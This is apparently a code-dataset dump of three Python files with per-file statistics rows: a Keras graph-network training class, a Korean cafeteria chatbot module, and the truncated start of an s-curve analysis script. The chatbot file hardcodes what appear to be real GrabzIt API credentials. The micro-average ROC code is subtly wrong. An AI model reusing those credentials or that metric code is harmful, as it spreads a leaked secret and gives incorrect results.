plot_train(history, train_data.task_type, workdir)
if test_data:
if self.multiclassification:
plot_auc_multiclassification(gnn, test_data, self.multiclassification, workdir, name='test')
else:
plot_auc(gnn, test_data, workdir, name='test')
if warm_up:
total_steps = int(epochs * sample_count / self.batch_size)
plot_warm_up_lr(warm_up_lr, total_steps, lr, workdir)
return gnn
def predict_datas(self, test_data, workdir=None):
print("load weights and predict...")
save_file = test_data.task_type + ".hdf5"
if workdir:
best_checkpoint = Path(workdir/"model"/save_file)
else:
best_checkpoint = Path(ModulePath/"model"/save_file)
gnn = self.gnn
gnn.load_weights(best_checkpoint)
Path(workdir/"results").mkdir(exist_ok=True)
if self.regression:
plot_mae(gnn, test_data, workdir, name='test')
else:
if self.multiclassification:
plot_auc_multiclassification(gnn, test_data, self.multiclassification, workdir, name='test')
else:
plot_auc(gnn, test_data, name='test')
def predict(self, data, workdir=None):
print("load weights and predict...")
save_file = data.task_type + ".hdf5"
if workdir:
best_checkpoint = Path(workdir/"model"/save_file)
else:
best_checkpoint = Path(ModulePath/"model"/save_file)
gnn = self.gnn
gnn.load_weights(best_checkpoint)
y_pred_keras = gnn.predict(data)
return y_pred_keras
class Finetune:
def __init__(self,
model: Model,
state_dim=16,
sp_dim=230,
regression=True,
ntarget=1,
multiclassification=None,
optimizer='Adam',
batch_szie=32,
**kwargs,
):
self.model = model
self.state_dim = state_dim
self.sp_dim = sp_dim
self.regression = regression
self.ntarget = ntarget
self.multiclassification = multiclassification
self.batch_size=batch_szie
self.optimizer = optimizer
self.gnn = model(
state_dim=state_dim,
sp_dim=sp_dim,
regression=regression,
multiclassification=multiclassification,
**kwargs)
def __getattr__(self, attr):
return getattr(self.gnn, attr)
def train(self, train_data, valid_data=None, test_data=None, epochs=200, lr=1e-3, warm_up=True, warmrestart=None,
patience=500, verbose=1, checkpoints=None, save_weights_only=True, workdir=None):
gnn = self.gnn
if self.regression:
gnn.compile(
loss=keras.losses.MeanAbsoluteError(),
optimizer=self.optimizer,
metrics=[keras.metrics.MeanAbsoluteError(name="mae")],
)
elif self.multiclassification:
gnn.compile(
loss=tf.keras.losses.CategoricalCrossentropy(),
optimizer=self.optimizer,
metrics=[tf.keras.metrics.AUC(name="AUC")],
)
else:
gnn.compile(
loss=tf.keras.losses.BinaryCrossentropy(),
optimizer=self.optimizer,
metrics=[tf.keras.metrics.AUC(name="AUC")],
)
print(gnn.summary())
keras.utils.plot_model(gnn, Path(workdir/"finetune.png"), show_dtype=True, show_shapes=True)
print(train_data.task_type)
Path(workdir/"model").mkdir(exist_ok=True)
Path(workdir/"model"/train_data.task_type).mkdir(exist_ok=True)
if checkpoints is None:
if self.regression:
filepath = Path(workdir/"model"/train_data.task_type/"gnn_{epoch:02d}-{val_mae:.3f}.hdf5")
checkpoint = ModelCheckpoint(filepath, monitor='val_mae', save_best_only=True, save_weights_only=save_weights_only, verbose=verbose, mode='min')
else:
filepath = Path(workdir/"model"/train_data.task_type/"gnn_{epoch:02d}-{val_AUC:.3f}.hdf5")
checkpoint = ModelCheckpoint(filepath, monitor='val_AUC', save_best_only=True, save_weights_only=save_weights_only, verbose=verbose, mode='max')
earlystop = EarlyStopping(monitor='val_loss', patience=patience, verbose=verbose, mode='min')
if warm_up:
sample_count = train_data.data_size
warmup_epoch = 5
train_per_epoch = sample_count / self.batch_size
warmup_steps = warmup_epoch * train_per_epoch
restart_epoches = warmrestart
warm_up_lr = WarmUpCosineDecayScheduler(epochs=epochs,
restart_epoches=restart_epoches,
train_per_epoch=train_per_epoch,
learning_rate_base=lr,
warmup_learning_rate=2e-6,
warmup_steps=warmup_steps,
hold_base_rate_steps=5,
)
checkpoints = [checkpoint, warm_up_lr, earlystop]
else:
reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.2, patience=50, verbose=1, min_lr=1e-6, mode='min')
checkpoints = [checkpoint, reduce_lr, earlystop]
if valid_data:
steps_per_train = int(np.ceil(train_data.data_size / self.batch_size))
steps_per_val = int(np.ceil(valid_data.data_size / self.batch_size))
else:
steps_per_train = None
steps_per_val = None
print("gnn fit")
history = gnn.fit(
train_data,
validation_data=valid_data,
steps_per_epoch=steps_per_train,
validation_steps=steps_per_val,
epochs=epochs,
verbose=verbose,
callbacks=checkpoints,
)
Path(workdir/"results").mkdir(exist_ok=True)
if self.regression:
plot_train_regression(history, train_data.task_type, workdir)
if test_data:
plot_mae(gnn, test_data, workdir, name='test')
else:
plot_train(history, train_data.task_type, workdir)
if test_data:
if self.multiclassification:
plot_auc_multiclassification(gnn, test_data, self.multiclassification, workdir, name='test')
else:
plot_auc(gnn, test_data, workdir, name='test')
if warm_up:
total_steps = int(epochs * sample_count / self.batch_size)
plot_warm_up_lr(warm_up_lr, total_steps, lr, workdir)
return gnn
def predict_datas(self, test_data, workdir=None):
print("load weights and predict...")
save_file = test_data.task_type + ".hdf5"
if workdir:
best_checkpoint = Path(workdir/"model"/save_file)
else:
best_checkpoint = Path(ModulePath/"model"/save_file)
gnn = self.gnn
gnn.load_weights(best_checkpoint)
Path(workdir/"results").mkdir(exist_ok=True)
if self.regression:
plot_mae(gnn, test_data, workdir, name='test')
else:
if self.multiclassification:
plot_auc_multiclassification(gnn, test_data, self.multiclassification, workdir, name='test')
else:
plot_auc(gnn, test_data, name='test')
def predict(self, data, workdir=None):
print("load weights and predict...")
save_file = data.task_type + ".hdf5"
if workdir:
best_checkpoint = Path(workdir/"model"/save_file)
else:
best_checkpoint = Path(ModulePath/"model"/save_file)
gnn = self.gnn
gnn.load_weights(best_checkpoint)
y_pred_keras = gnn.predict(data)
return y_pred_keras
def plot_train(history, name, path):
print("plot curve of training")
plt.figure(figsize=(10, 12))
plt.subplot(2,1,1)
plt.plot(history.history["AUC"], label="train AUC")
plt.plot(history.history["val_AUC"], label="valid AUC")
plt.xlabel("Epochs", fontsize=16)
plt.ylabel("AUC", fontsize=16)
plt.legend(fontsize=16)
plt.subplot(2,1,2)
plt.plot(history.history["loss"], label="train loss")
plt.plot(history.history["val_loss"], label="valid loss")
plt.xlabel("Epochs", fontsize=16)
plt.ylabel("loss", fontsize=16)
plt.legend(fontsize=16)
save_path = name + "_train.png"
plt.savefig(path/"results"/save_path)
def plot_train_regression(history, name, path):
print("plot curve of training")
plt.figure(figsize=(10, 12))
plt.subplot(2,1,1)
plt.plot(history.history["mae"], label="train mae")
plt.plot(history.history["val_mae"], label="valid mae")
plt.xlabel("Epochs", fontsize=16)
plt.ylabel("mae", fontsize=16)
plt.legend(fontsize=16)
plt.subplot(2,1,2)
plt.plot(history.history["loss"], label="train loss")
plt.plot(history.history["val_loss"], label="valid loss")
plt.xlabel("Epochs", fontsize=16)
plt.ylabel("loss", fontsize=16)
plt.legend(fontsize=16)
save_path = name + "_train.png"
plt.savefig(path/"results"/save_path)
def plot_auc(gnn, test_data, path, name="test"):
print("predict")
name = test_data.task_type + '_' + name
y_pred_keras = gnn.predict(test_data).ravel()
fpr_keras, tpr_keras, _ = roc_curve(test_data.labels, y_pred_keras)
auc_keras = auc(fpr_keras, tpr_keras)
print("auc on test data: ", auc_keras)
plt.figure(figsize=(10, 6))
plt.plot([0, 1], [0, 1], 'k--')
plt.plot(fpr_keras, tpr_keras, label="Keras (area = {:.3f})".format(auc_keras))
plt.xlabel("False positive rate")
plt.ylabel("True positive rate")
plt.title("ROC curve test")
plt.legend(loc="best")
save_path = name + "_predict" + ".png"
plt.savefig(Path(path/"results"/save_path))
def plot_auc_multiclassification(gnn, datas, n_classes, path, name="test"):
print("predict")
name = datas.task_type + '_' + name
y_pred_keras = gnn.predict(datas)
fpr = dict()
tpr = dict()
roc_auc = dict()
for i in range(n_classes):
fpr[i], tpr[i], _ = roc_curve(datas.labels[:, i], y_pred_keras[:, i])
roc_auc[i] = auc(fpr[i], tpr[i])
# Compute micro-average ROC curve and ROC area
fpr["micro"], tpr["micro"], _ = roc_curve(np.array(datas.labels)[:, i], y_pred_keras[:, i])
roc_auc["micro"] = auc(fpr["micro"], tpr["micro"])
# Compute macro-average ROC curve and ROC area
# First aggregate all false positive rates
all_fpr = np.unique(np.concatenate([fpr[i] for i in range(n_classes)]))
# Then interpolate all ROC curves at this points
mean_tpr = np.zeros_like(all_fpr)
for i in range(n_classes):
mean_tpr += interp(all_fpr, fpr[i], tpr[i])
# Finally average it and compute AUC
mean_tpr /= n_classes
fpr["macro"] = all_fpr
tpr["macro"] = mean_tpr
roc_auc["macro"] = auc(fpr["macro"], tpr["macro"])
# Plot all ROC curves
plt.figure(figsize=(10, 6))
plt.plot(fpr["micro"], tpr["micro"],
label='micro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["micro"]),
color='deeppink', linestyle=':', linewidth=4)
plt.plot(fpr["macro"], tpr["macro"],
label='macro-average ROC curve (area = {0:0.2f})'
''.format(roc_auc["macro"]),
color='navy', linestyle=':', linewidth=4)
for i in range(n_classes):
print("auc on ", name, " datas: class", i, " auc: ", roc_auc[i])
plt.plot(fpr[i], tpr[i], lw=2,
label='ROC curve of class {0} (area = {1:0.2f})'
''.format(i, roc_auc[i]))
plt.plot([0, 1], [0, 1], 'k--', lw=2)
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel("False Positive Rate")
plt.ylabel("True Positive Rate")
plt.title("Some extension of Receiver operating characteristic to multi-class")
plt.legend(loc="lower right")
save_path = name + "_predict" + ".png"
plt.savefig(Path(path/"results"/save_path))
def plot_mae(gnn, test_data, path, name="test"):
print('predict')
name = test_data.task_type + '_' + name
y_pred_keras = gnn.predict(test_data).ravel()
r2 = r2_score(test_data.labels, y_pred_keras)
axis_min = np.mean(test_data.labels) - np.std(test_data.labels)
axis_max = np.mean(test_data.labels) + np.std(test_data.labels)
print("r2 score: ", r2)
plt.figure(figsize=(10, 6))
plt.scatter(test_data.labels, y_pred_keras, color="orange")
plt.plot([-2, 6], [-2, 6], 'r--')
plt.xlim(axis_min, axis_max)
plt.ylim(axis_min, axis_max)
plt.xlabel("experimetal", fontsize=16)
plt.ylabel("pred", fontsize=16)
plt.title('predicted')
save_path = name + "_predict" + ".png"
plt.savefig(Path(path/"results"/save_path))
def plot_warm_up_lr(warm_up_lr, total_steps, lr, path):
plt.plot(warm_up_lr.learning_rates)
plt.xlabel("Step", fontsize=20)
plt.ylabel("lr", fontsize=20)
plt.axis([0, total_steps, 0, lr*1.1])
# plt.xticks(np.arange(0, epochs, 1))
plt.grid()
plt.title("Cosine decay with warmup", fontsize=20)
plt.savefig(Path(path/"results"/"cosine_decay.png"))
| 38.133858
| 160
| 0.58757
| 2,870
| 24,215
| 4.727526
| 0.092334
| 0.021816
| 0.020342
| 0.0213
| 0.857385
| 0.843824
| 0.821713
| 0.804098
| 0.792232
| 0.785009
| 0
| 0.01463
| 0.302788
| 24,215
| 635
| 161
| 38.133858
| 0.789019
| 0.014413
| 0
| 0.776091
| 0
| 0
| 0.072656
| 0.007127
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036053
| false
| 0
| 0.020873
| 0.005693
| 0.075901
| 0.043643
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a16fed8fa689c69d100d2f8191f42bd284a6932a
| 16,626
|
py
|
Python
|
cnuchatbot/chatbotapp/cnudata/cafeteria/cafeteria.py
|
ChanhyukPark-Tech/CnuChatBot
|
c204b7f037a7dc8a2ca7f398a84aae68df245327
|
[
"MIT"
] | null | null | null |
cnuchatbot/chatbotapp/cnudata/cafeteria/cafeteria.py
|
ChanhyukPark-Tech/CnuChatBot
|
c204b7f037a7dc8a2ca7f398a84aae68df245327
|
[
"MIT"
] | null | null | null |
cnuchatbot/chatbotapp/cnudata/cafeteria/cafeteria.py
|
ChanhyukPark-Tech/CnuChatBot
|
c204b7f037a7dc8a2ca7f398a84aae68df245327
|
[
"MIT"
] | null | null | null |
from chatbotapp.cnudata.cafeteria.studenthall1_info import *
from chatbotapp.cnudata.cafeteria.food_court_time import *
from chatbotapp.cnudata.cafeteria.dorm_info import *
from chatbotapp.cnudata.cafeteria.new_studenthall2_info import *
from chatbotapp.common.variables.cafeteria import *
from chatbotapp.common.functions import *
from GrabzIt import GrabzItImageOptions
from GrabzIt import GrabzItClient
from datetime import datetime
import requests
import schedule
def get_entire_cafeteria_info():
response_text = "충남대학교 학식 정보"
answer = insert_text(response_text)
answer = insert_multiple_reply(answer, cafeteriaNormalReplies)
return answer
def get_studenthall1_answer():
answer = insert_image(studenthall1Image_BASE_URL, "img")
answer = insert_multiple_reply(answer, cafeteriaNormalReplies)
return answer
def get_variousCafeteria_info():
text = "보고 싶은 식당을 선택해주세요"
answer = insert_text(text)
answer = insert_multiple_reply(answer, [["학생", "학생"], ["교직원", "교직원"]])
return answer
# http://3.38.250.164/cnuchatbot/media/savedImage/123.png/
def get_variousCafeteria_answer(person):
# default 교직원
personCategory = "CCS01.10"
if person == "학생":
personCategory = "CCS01.20"
answer = make_card(
mealCategoryKoreans[0],
"",
"http://3.38.250.164/cnuchatbot/media/savedImage/{}-{}.png".format(
personCategory, mealCategory[0]
),
)
for index in range(1, 5):
insert_card(
answer,
mealCategoryKoreans[index],
"",
"http://3.38.250.164/cnuchatbot/media/savedImage/{}-{}.png".format(
personCategory, mealCategory[index]
),
)
return answer
def get_variousCafeteria_images():
# jsp 사진 보내주는 로직
grabzIt = GrabzItClient.GrabzItClient(
"N2Y5Yjg1ZTY5NGIzNDE5ZmIzYmM4OGQ0MGQwMDk1N2Y=",
"Qz9LP1lkPz8GPz8QTDk/TGU/Pz8/PyQ/IC4xNT8EVD8=",
)
options = GrabzItImageOptions.GrabzItImageOptions()
options.browserHeight = -1
options.format = "png"
options.width = -1
options.height = -1
for person in personCategory:
for meal in mealCategory:
data = {"cafe_div_cd": person, "food_div_cd": meal, "langType": "1"}
r = requests.post(
variousCafeteria_BASE_URL,
data=data,
headers={"Content-Type": "application/x-www-form-urlencoded"},
)
grabzIt.HTMLToImage(r.text, options)
# Then call the Save or SaveTo method
grabzIt.SaveTo(
"cnuchatbot/media/savedImage/{0}-{1}.png".format(person, meal)
)
return insert_text("sad")
# 매주 월요일에 동작
schedule.every().monday.do(get_variousCafeteria_images)
def get_studenthall23_answer(name):
answer = get_studenthall23_answer_info(name)
return answer
def get_entire_time():
answer = entire_time()
return answer
def day_of_week_dorm(the_day_of_week_number):
if Weekday.MONDAY.value == the_day_of_week_number:
answer = day_of_week("MONDAY")
if Weekday.TUESDAY.value == the_day_of_week_number:
answer = day_of_week("TUESDAY")
if Weekday.WEDNESDAY.value == the_day_of_week_number:
answer = day_of_week("WEDNESDAY")
if Weekday.THURSDAY.value == the_day_of_week_number:
answer = day_of_week("THURSDAY")
if Weekday.FRIDAY.value == the_day_of_week_number:
answer = day_of_week("FRIDAY")
if Weekday.SATURDAY.value == the_day_of_week_number:
answer = day_of_week("SATURDAY")
if Weekday.SUNDAY.value == the_day_of_week_number:
answer = day_of_week("SUNDAY")
return answer
# def get_monday_breakfast_menu():
# text = monday_dorm_menu("breakfast")
# answer = insert_text(text)
# reply = make_reply("다른식당보기", "학식")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른요일보기", "기숙사식당")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른시간보기", "월요일기숙사식당")
# answer = insert_replies(answer, reply)
#
# return answer
#
# def get_monday_lunch_menu():
# text = monday_dorm_menu("lunch")
# answer = insert_text(text)
# reply = make_reply("다른식당보기", "학식")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른요일보기", "기숙사식당")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른시간보기", "월요일기숙사식당")
# answer = insert_replies(answer, reply)
#
# return answer
#
# def get_monday_dinner_menu():
# text = monday_dorm_menu("dinner")
# answer = insert_text(text)
# reply = make_reply("다른식당보기", "학식")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른요일보기", "기숙사식당")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른시간보기", "월요일기숙사식당")
# answer = insert_replies(answer, reply)
#
# return answer
def get_entire_menu(when, the_day_of_week_number):
# if Weekday.MONDAY.value == the_day_of_week_number:
# reply = make_reply("다른시간보기", "월요일기숙사식당")
# if Weekday.TUESDAY.value == the_day_of_week_number:
# reply = make_reply("다른시간보기", "화요일기숙사식당")
# if Weekday.WEDNESDAY.value == the_day_of_week_number:
# reply = make_reply("다른시간보기", "수요일기숙사식당")
# if Weekday.THURSDAY.value == the_day_of_week_number:
# reply = make_reply("다른시간보기", "목요일기숙사식당")
# if Weekday.FRIDAY.value == the_day_of_week_number:
# reply = make_reply("다른시간보기", "금요일기숙사식당")
# if Weekday.SATURDAY.value == the_day_of_week_number:
# reply = make_reply("다른시간보기", "토요일기숙사식당")
# if Weekday.SUNDAY.value == the_day_of_week_number:
# reply = make_reply("다른시간보기", "일요일기숙사식당")
# text = dorm_menu(when, the_day_of_week_number) 원래 이거였는데 , 3가지 다 한꺼번에 나오도록
text = dorm_menu("breakfast", the_day_of_week_number)
text += "\n"
text += dorm_menu("lunch", the_day_of_week_number)
text += "\n"
text += dorm_menu("dinner", the_day_of_week_number)
answer = insert_text(text)
# answer = insert_replies(answer,reply)
reply = make_reply("다른식당보기", "학식")
answer = insert_replies(answer, reply)
reply = make_reply("다른요일보기", "기숙사식당")
answer = insert_replies(answer, reply)
return answer
# print(get_entire_menu("breakfast",1))
#
# def get_monday_menu(when):
# text = monday_dorm_menu(when)
# answer = insert_text(text)
# reply = make_reply("다른시간보기", "월요일기숙사식당")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른식당보기", "학식")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른요일보기", "기숙사식당")
# answer = insert_replies(answer, reply)
#
#
# return answer
#
# def get_tuesday_menu(when):
# text = tuesday_dorm_menu(when)
# answer = insert_text(text)
# reply = make_reply("다른식당보기", "학식")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른요일보기", "기숙사식당")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른시간보기", "화요일기숙사식당")
# answer = insert_replies(answer, reply)
# return answer
# # def get_tuesday_breakfast_menu():
# # text = tuesday_dorm_menu("breakfast")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "화요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
# #
# # def get_tuesday_lunch_menu():
# # text = tuesday_dorm_menu("lunch")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "화요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
# #
# # def get_tuesday_dinner_menu():
# # text = tuesday_dorm_menu("dinner")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "화요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
#
# def get_wednesday_menu(when):
# text = wednesday_dorm_menu(when)
# answer = insert_text(text)
# reply = make_reply("다른식당보기", "학식")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른요일보기", "기숙사식당")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른시간보기", "수요일기숙사식당")
# answer = insert_replies(answer, reply)
#
# return answer
#
# # def get_wednesday_breakfast_menu():
# # text = wednesday_dorm_menu("breakfast")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "수요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
# #
# # def get_wednesday_lunch_menu():
# # text = wednesday_dorm_menu("lunch")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "수요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
# #
# # def get_wednesday_dinner_menu():
# # text = wednesday_dorm_menu("dinner")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "수요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
#
# def get_thursday_menu(when):
# text = thursday_dorm_menu(when)
# answer = insert_text(text)
# reply = make_reply("다른식당보기", "학식")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른요일보기", "기숙사식당")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른시간보기", "목요일기숙사식당")
# answer = insert_replies(answer, reply)
#
# return answer
#
# # def get_thursday_breakfast_menu():
# # text = thursday_dorm_menu("breakfast")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "목요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
# #
# # def get_thursday_lunch_menu():
# # text = thursday_dorm_menu("lunch")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "목요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
# #
# # def get_thursday_dinner_menu():
# # text = thursday_dorm_menu("dinner")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "목요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
#
# def get_friday_menu(when):
# text = friday_dorm_menu(when)
# answer = insert_text(text)
# reply = make_reply("다른식당보기", "학식")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른요일보기", "기숙사식당")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른시간보기", "금요일기숙사식당")
# answer = insert_replies(answer, reply)
#
# return answer
# # def get_friday_breakfast_menu():
# # text = friday_dorm_menu("breakfast")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "금요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
# #
# # def get_friday_lunch_menu():
# # text = friday_dorm_menu("lunch")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "금요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
# #
# # def get_friday_dinner_menu():
# # text = friday_dorm_menu("dinner")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "금요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
#
#
# def get_saturday_menu(when):
# text = saturday_dorm_menu(when)
# answer = insert_text(text)
# reply = make_reply("다른식당보기", "학식")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른요일보기", "기숙사식당")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른시간보기", "토요일기숙사식당")
# answer = insert_replies(answer, reply)
#
# return answer
#
# # def get_saturday_breakfast_menu():
# # text = saturday_dorm_menu("breakfast")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "토요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
# #
# # def get_saturday_lunch_menu():
# # text = saturday_dorm_menu("lunch")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "토요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
# #
# # def get_saturday_dinner_menu():
# # text = saturday_dorm_menu("dinner")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "토요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
# #
# # def get_sunday_breakfast_menu():
# # text = sunday_dorm_menu("breakfast")
# # answer = insert_text(text)
# # reply = make_reply("다른식당보기", "학식")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른요일보기", "기숙사식당")
# # answer = insert_replies(answer, reply)
# # reply = make_reply("다른시간보기", "일요일기숙사식당")
# # answer = insert_replies(answer, reply)
# #
# # return answer
#
# def get_sunday_menu(when):
# text = sunday_dorm_menu(when)
# answer = insert_text(text)
# reply = make_reply("다른식당보기", "학식")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른요일보기", "기숙사식당")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른시간보기", "일요일기숙사식당")
# answer = insert_replies(answer, reply)
#
# return answer
# def get_sunday_lunch_menu():
# text = sunday_dorm_menu("lunch")
# answer = insert_text(text)
# reply = make_reply("다른식당보기", "학식")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른요일보기", "기숙사식당")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른시간보기", "일요일기숙사식당")
# answer = insert_replies(answer, reply)
#
# return answer
#
# def get_sunday_dinner_menu():
# text = sunday_dorm_menu("dinner")
# answer = insert_text(text)
# reply = make_reply("다른식당보기", "학식")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른요일보기", "기숙사식당")
# answer = insert_replies(answer, reply)
# reply = make_reply("다른시간보기", "일요일기숙사식당")
# answer = insert_replies(answer, reply)
#
# return answer
#
| 33.318637
| 80
| 0.640683
| 1,908
| 16,626
| 5.322851
| 0.084906
| 0.144151
| 0.1282
| 0.214159
| 0.822469
| 0.771859
| 0.754825
| 0.751477
| 0.747735
| 0.728436
| 0
| 0.005752
| 0.215807
| 16,626
| 498
| 81
| 33.385542
| 0.773201
| 0.698063
| 0
| 0.211538
| 0
| 0
| 0.105898
| 0.035746
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086538
| false
| 0
| 0.105769
| 0
| 0.278846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a1759a2c25ae32cd79edc55f45269fc1da552b9b
| 38,184
|
py
|
Python
|
software/scripts/SCurveNP.py
|
slaclab/atlas-chess2
|
2135a79e1b43bb404abc50aeabe50e577242aa45
|
[
"BSD-3-Clause-LBNL"
] | 1
|
2017-10-24T19:04:40.000Z
|
2017-10-24T19:04:40.000Z
|
software/scripts/SCurveNP.py
|
slaclab/atlas-chess2
|
2135a79e1b43bb404abc50aeabe50e577242aa45
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
software/scripts/SCurveNP.py
|
slaclab/atlas-chess2
|
2135a79e1b43bb404abc50aeabe50e577242aa45
|
[
"BSD-3-Clause-LBNL"
] | 3
|
2017-10-24T19:04:22.000Z
|
2020-12-13T00:13:32.000Z
|
####import ROOT as R
import numpy as np
import matplotlib #.pyplot as plt
import sys
import time
import re
import logging
# Generating log file
def logfile(logfilename):
logger=logging.getLogger()
LOG_FILE=logfilename
LOG_FORMAT="%(asctime)s : %(funcName)s: %(message)s"
logging.basicConfig(filename=LOG_FILE,level=logging.DEBUG, format=LOG_FORMAT)
return logger
#transfer the data
def load_chess2_data(filename):
for i in [2]:
file_data=open(sys.argv[1],'r')
for line in file_data.readlines():
if ('Shape' in line):
shape_hist=re.findall('\d+',line)
# print(len(shape_hist))
break
data_1d=np.loadtxt(sys.argv[1])
hists=data_1d.reshape(int(shape_hist[0]),int(shape_hist[1]),int(shape_hist[2]),int(shape_hist[3]))
return hists
def get_thresholds(filename):
file_data=open(sys.argv[1],'r')
line_count=0
start=False
for line in file_data.readlines():
line_count+=1
if ('thresholds (raw)' in line):
thresholds=re.findall('\d+',line)
start_line=line_count
start=True
if (start):
if (line_count>start_line):
if (not (']' in line)):
thresholds1=re.findall('\d+',line)
thresholds.extend(thresholds1)
else:
thresholds1=re.findall('\d+',line)
thresholds.extend(thresholds1)
break
return thresholds
def makeSCurve(system,nCounts,thresholdCuts,pixels=None,histFileName="scurve.root"):
nColumns = 32
nRows = 128
allHists = []
